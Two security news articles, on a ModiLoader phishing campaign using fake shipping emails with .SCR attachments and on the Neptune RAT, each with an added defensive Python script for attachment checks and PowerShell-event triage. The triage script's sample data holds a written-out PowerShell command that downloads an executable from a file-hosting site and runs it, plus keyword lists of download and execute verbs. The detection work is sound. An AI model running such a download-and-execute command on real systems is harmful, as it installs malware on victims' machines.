Hackers Disguise Malware As Screensaver Files In Fake Shipping Email Attack

  • Written by Kiara Fabbri, Former Tech News Writer
  • Fact-Checked by Sarah Frazier, Former Content Manager

Cybersecurity firm Symantec has uncovered a phishing campaign targeting industries across Asia, Europe, and the U.S., using fake shipping emails and disguised screensaver files to infect victims with malware.

In a rush? Here are the quick facts:

  • The ModiLoader tool deploys malware including Remcos, Agent Tesla, and AsyncRAT.
  • The emails pretend to be official shipping updates from a prominent Taiwanese freight company.
  • The attack targets four sectors: electronics, automotive, manufacturing, and broadcasting.

Attackers pretend to be a major Taiwanese freight and logistics company and send phishing emails in Chinese that look like real shipment updates. The subject line includes detailed shipping info, referencing customs clearance from Kaohsiung to Atlanta on April 7.

The recipients are then asked to verify shipping documents such as the ISF, packing list, and invoice. The attachment contains a malicious file disguised as a Windows screensaver (.SCR). When clicked, it silently installs a malware loader called ModiLoader.

GBHackers notes that ModiLoader is a known threat that downloads and installs remote access tools and information-stealing malware. Symantec has reported that it has been used to drop malware such as Remcos, Agent Tesla, MassLogger, AsyncRAT, and Formbook.

“While they might appear harmless, they are essentially executable programs with a different file extension. Once executed, these files can perform any action a regular executable can—such as installing loaders, backdoors, keyloggers, or ransomware. As of today, they continue to be heavily used in attack chains,” warned Symantec.
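The point Symantec makes above, that an .SCR file is an ordinary Windows executable under a different name, is something a mail gateway or triage script can check directly. The following Python is an added example, not code from the article or from Symantec: it flags attachments whose extension is executable, whose name hides that extension behind a document-looking one, or whose bytes carry a DOS/PE header regardless of what the name claims. The sample attachment contents are constructed for the example (the PE stub is only a header layout, not a runnable program), and the file names are hypothetical.

```python
"""Added example (not from the article): flag e-mail attachments that are
Windows executables disguised as screensavers or documents."""
import struct
from dataclasses import dataclass, field
from pathlib import PurePosixPath

# Extensions Windows runs directly; a .scr is a renamed .exe (assumption:
# this list is the reviewer's own, not one the article gives).
EXECUTABLE_EXTENSIONS = {".scr", ".exe", ".pif", ".com", ".cpl"}


@dataclass
class Finding:
    filename: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def is_pe_image(data: bytes) -> bool:
    """True if data carries a DOS/PE header: 'MZ' magic at offset 0 and a
    'PE\\0\\0' signature at the offset stored in e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def inspect_attachment(filename: str, data: bytes) -> Finding:
    """Combine name-based and content-based checks into one finding."""
    finding = Finding(filename)
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    last = suffixes[-1] if suffixes else ""
    if last in EXECUTABLE_EXTENSIONS:
        finding.reasons.append(f"executable extension {last}")
        if len(suffixes) > 1:
            # e.g. invoice.pdf.scr: a document extension placed before the real one
            finding.reasons.append(f"double extension {''.join(suffixes)}")
    if is_pe_image(data):
        finding.reasons.append("content is a PE executable")
        if last not in EXECUTABLE_EXTENSIONS:
            finding.reasons.append("PE content hidden behind non-executable extension")
    return finding


def constructed_pe_stub() -> bytes:
    """Constructed sample: the smallest byte layout is_pe_image() accepts.
    It is a header skeleton only and cannot execute."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> right after header
    return bytes(header) + b"PE\0\0"


# Constructed sample attachments (hypothetical names and contents).
SAMPLE_ATTACHMENTS = {
    "ISF_packing_list_invoice.scr": constructed_pe_stub(),
    "invoice.pdf.scr": constructed_pe_stub(),
    "invoice.pdf": b"%PDF-1.7\n%constructed sample\n",
    "packing_list.docx": constructed_pe_stub(),  # PE bytes under a document name
}


def scan(attachments: dict) -> list:
    """Return the names of attachments that raised at least one reason."""
    return [name for name, data in attachments.items()
            if inspect_attachment(name, data).suspicious]


if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS.items():
        f = inspect_attachment(name, data)
        print(f"{name}: {'SUSPICIOUS ' + '; '.join(f.reasons) if f.suspicious else 'ok'}")
```

The content check matters more than the name check: renaming the file does not change its bytes, so a gateway that only blocks by extension misses the same payload shipped as "packing_list.docx", while the MZ/PE test catches both.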

The campaign has affected multiple sectors including automotive, electronics, publishing, broadcasting, and manufacturing, and the victims are located in countries such as Japan, the UK, Sweden, the U.S., Hong Kong, Taiwan, Thailand, and Malaysia.

Symantec is fighting the threat by using a variety of protections including machine learning, file scanning, email filtering, and Carbon Black endpoint security. The malware has been flagged under multiple names including Trojan.Gen.MBT and Scr.Malcode!gen19.

Experts urge businesses to educate employees about suspicious emails.

Hackers Use Neptune RAT to Spy, Steal, and Wipe Victim Computers

  • Written by Kiara Fabbri, Former Tech News Writer
  • Fact-Checked by Sarah Frazier, Former Content Manager

A dangerous new version of Neptune RAT, a powerful Remote Access Trojan (RAT), has been discovered by cybersecurity researchers at CYFIRMA. This malware can steal passwords, hijack cryptocurrency transactions, spy on victims in real time, and even destroy Windows systems.

In a rush? Here are the quick facts:

  • It steals passwords from 270+ apps, including Chrome and Brave.
  • The malware swaps crypto wallet addresses to hijack transactions.
  • It disables antivirus software and corrupts system files to avoid detection.

The malware is being spread on GitHub, Telegram, and YouTube, often advertised as the “Most Advanced RAT.” Attackers use PowerShell commands to download and execute the malware.

Attackers use a malicious script hosted on catbox.moe to download and execute the malware silently. Neptune RAT is installed in the victim’s AppData folder and then connects to a remote server, giving attackers complete control of the infected machine.
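The delivery chain just described (a PowerShell command pulling a payload from a file-hosting site, an executable then running out of AppData) leaves a recognisable trace in process-creation telemetry. The Python below is an added example, not code from the article or from CYFIRMA: it scores constructed process-creation events against that pattern and returns the ones worth a look. The event records, host names, user names and file paths are all constructed for the example, and the keyword lists and scoring weights are the reviewer's own assumptions rather than anything the article specifies.

```python
"""Added example (not from the article): score process-creation events for
the delivery pattern described above."""
import re

# Assumed indicator lists; tune them to your own telemetry.
DOWNLOAD_VERBS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                  "start-bitstransfer", "net.webclient", "curl ", "wget ")
EXEC_VERBS = ("invoke-expression", "iex ", "start-process", "-encodedcommand")
WATCHLIST_DOMAINS = {"catbox.moe", "files.catbox.moe"}  # host named in the article
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
APPDATA_EXE_RE = re.compile(r"\\AppData\\.*\.(exe|scr|dll)$", re.I)


def score_event(event: dict) -> tuple:
    """Return (score, reasons) for one event with keys image, cmdline,
    parent_image. Higher scores mean more of the pattern is present."""
    image = event.get("image", "")
    cmd = event.get("cmdline", "").lower()
    parent = event.get("parent_image", "").lower()
    score, reasons = 0, []

    if "powershell" in image.lower() or "powershell" in cmd:
        match = URL_RE.search(cmd)
        if match:
            score += 2
            reasons.append(f"remote URL host {match.group(1)}")
            if match.group(1) in WATCHLIST_DOMAINS:
                score += 3
                reasons.append("watchlisted file-hosting domain")
        if any(v in cmd for v in DOWNLOAD_VERBS):
            score += 2
            reasons.append("download verb in PowerShell command line")
        if any(v in cmd for v in EXEC_VERBS):
            score += 2
            reasons.append("execute verb in PowerShell command line")

    if APPDATA_EXE_RE.search(image):
        score += 2
        reasons.append("executable running from AppData")
        if "powershell" in parent:
            score += 3
            reasons.append("AppData executable spawned by PowerShell")
    return score, reasons


def triage(events: list, threshold: int = 5) -> list:
    """Indexes of events whose score reaches the threshold."""
    return [i for i, e in enumerate(events) if score_event(e)[0] >= threshold]


# Constructed sample events (hypothetical host, user and paths).
SAMPLE_EVENTS = [
    {"host": "ws-07", "user": "alice",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
     "parent_image": "C:\\Windows\\explorer.exe"},
    {"host": "ws-07", "user": "alice",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": ("powershell.exe -NoProfile -Command \"Invoke-WebRequest "
                 "https://files.catbox.moe/EXAMPLE-ID -OutFile $env:APPDATA\\svc.exe; "
                 "Start-Process $env:APPDATA\\svc.exe\""),
     "parent_image": "C:\\Windows\\explorer.exe"},
    {"host": "ws-07", "user": "alice",
     "image": "C:\\Users\\alice\\AppData\\Roaming\\svc.exe",
     "cmdline": "C:\\Users\\alice\\AppData\\Roaming\\svc.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"host": "ws-07", "user": "alice",
     "image": "C:\\Program Files\\Notepad\\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt",
     "parent_image": "C:\\Windows\\explorer.exe"},
]


if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        score, reasons = score_event(SAMPLE_EVENTS[i])
        print(f"event {i} score={score}: {'; '.join(reasons)}")
```

Scoring rather than a single keyword match keeps routine administrative PowerShell (the first sample event) below the threshold, while the download-and-run command and the AppData executable it produces both clear it. The domain watchlist is the weakest signal, since hosting sites change; the verb and parent-process relationships are what hold up over time.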

The Neptune RAT poses a significant threat because it includes a range of capabilities. It’s able to steal passwords and extract login information from over 270 applications — including popular web browsers like Chrome, Opera, and Brave.

It also functions as a crypto clipper, replacing copied cryptocurrency wallet addresses with the attacker’s own to hijack transactions. In more extreme cases, it operates as ransomware, encrypting files and demanding Bitcoin payments for their release.

The malware can even monitor the victim’s screen in real time, and in severe attacks, it can corrupt the Master Boot Record (MBR), making the system unbootable. It also disables antivirus software upon installation to avoid detection.

Neptune RAT remains hidden through code obfuscation methods, including Arabic text and emojis, which make it harder for researchers to analyze its code. Additionally, the malware includes anti-virtual-machine protection, which triggers shutdown routines when it detects analysis activity.

According to CYFIRMA, the malware’s creator, who goes by the name “Mason Team,” has uploaded demonstrations on YouTube and offers a free version of Neptune RAT on GitHub. The research reports that the developer claims to be a Moscow-born coder currently residing in Saudi Arabia, with public Discord and YouTube activity linked to the malware’s development.